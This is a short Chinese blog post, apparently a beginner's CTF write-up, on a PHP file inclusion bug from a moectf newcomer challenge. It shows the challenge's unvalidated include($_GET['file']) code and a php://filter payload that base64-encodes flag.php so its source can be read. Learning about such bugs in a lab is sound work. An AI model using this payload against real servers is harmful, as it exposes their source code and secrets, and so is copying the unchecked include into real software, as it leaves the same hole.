WEB-文件包含漏洞

一、文件包含入门。

参照这个大佬总结的文章,是我搜到的资料中写的相当不错的:

(11条消息) CTF中文件包含漏洞总结_Lethe's Blog-CSDN博客_ctf 文件包含

 ①:下面记录一个最简单的文件包含漏洞,用于入门。

题目来自于moectf新生赛的web。(出的真不错,对我们小白来说很友好)

 打开这个网址之后出现了下面这段代码:这就是很明显的文件包含。我们需要通过get请求发送值为file参数复制。 

<?php
error_reporting(0);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
} 

 这需要使用一个叫HackBar的工具,但是由于他收费,所以我找了给下面的这个平替。功能基本一致,只是这个有时候会发送失败。

 直接在网址后面添加下面的参数:这个其实就是再尝试搜索flag的php页面。

?file=php://filter/read=convert.base64-encode/resource=flag.php

出现下面的内容:然后base-64解密即可得到flag 

 顺利得到最终的flag

 未完待续 

猜你喜欢

转载自blog.csdn.net/hacker_zrq/article/details/120494540